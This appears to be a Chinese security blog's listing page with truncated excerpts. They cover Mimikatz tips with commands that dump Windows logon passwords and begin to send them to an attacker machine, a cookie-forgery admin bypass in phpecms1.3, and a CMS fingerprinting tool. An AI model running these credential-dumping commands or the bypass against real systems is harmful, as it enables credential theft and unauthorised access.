热门 Mimikatz 使用Tips

时间:2016-11-11   作者:webbaozi   分类: 小技巧   热度:1620°    
时间:2016-11-11   分类: 小技巧    热度:1620  
 ps:以管理员身份运行 1.记录 Mimikatz输出:  C:\>mimikatz.exe ""privilege::debug"" ""log sekurlsa::logonpasswords full"" exit && dir 2.将输出导入到本地文件:  C:\>mimikatz.exe ""privilege::debug"" ""sekurlsa::logonpasswords full"" exit >> log.txt 3.将输出传输到远程机器:  Attacker执行:&nbs...

阅读全文>>

热门 phpecms1.3 cookies欺骗漏洞进后台

时间:2016-11-11   作者:webbaozi   分类: 代码审计   热度:1177°    
时间:2016-11-11   分类: 代码审计    热度:1177  
phpecms1.3/admin/cms_check.php <?php if(!isset($_COOKIE['admin_name'])){ alert_href('非法登录','cms_login.php'); }; ?> 判断如果没有admin_name的cookie就跳登录页面,如果admin_name就不跳了。 phpecms1.3/admin/cms_welcome.php <?php include('../system/inc.php');...

阅读全文>>

热门 CMS指纹识别

时间:2016-11-11   作者:webbaozi   分类: 安全工具   热度:3585°    
时间:2016-11-11   分类: 安全工具    热度:3585  
首先看下界面吧 提交任务: Lib和static目录均是框架自带的.css和.js文件 Include目录下config.inc.php数据库配置文件 Sql文件打包,自行修改 登录账号baozi/baozi123   目前只是做了关键字查询的 MD5识别等识别方式都是可以自行添加的 Python Bin目录是cms识别方式 Version目录是版本识别方式 Exp目录是漏洞利用(还未做收集) ...

阅读全文>>

返回顶部    首页    手机版本   
版权所有:baozi|学与用    站长: webbaozi  蜀ICP备16032848号-1